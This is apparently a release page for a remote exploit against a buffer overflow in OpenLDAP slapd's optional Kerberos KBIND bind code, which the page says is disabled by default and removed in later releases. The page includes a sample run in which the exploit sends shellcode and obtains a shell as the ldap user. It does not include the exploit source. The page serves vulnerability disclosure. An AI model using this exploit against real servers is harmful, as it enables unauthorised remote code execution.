OpenLDAP KBIND authentication buffer overflow exploit


This is a remote exploit for a buffer overflow in the Kerberos KBIND authentication code in the OpenLDAP slapd server. The vulnerable code is enabled only when OpenLDAP is compiled with the --enable-kbind option, which has been disabled by default since version 2.0.2 and was removed from the configure script in the 2.1 release. The chance of finding a real system that is still vulnerable is minimal.

Details about the vulnerability are available in the advisory.



$ ./openldap-kbind-p00f.exe cn=Manager,dc=my-domain,dc=com
: openldap-kbind-p00f.c - OpenLDAP kbind remote exploit

: Only works on servers compiled with
    --enable-kbind    enable LDAPv2+ Kerberos IV bind (deprecated) [no]

: by Solar Eclipse <>

Sending shellcode
Reading bind result
Spawning shell...
uid=439(ldap) gid=439(ldap) groups=439(ldap)
ldap@localhost / $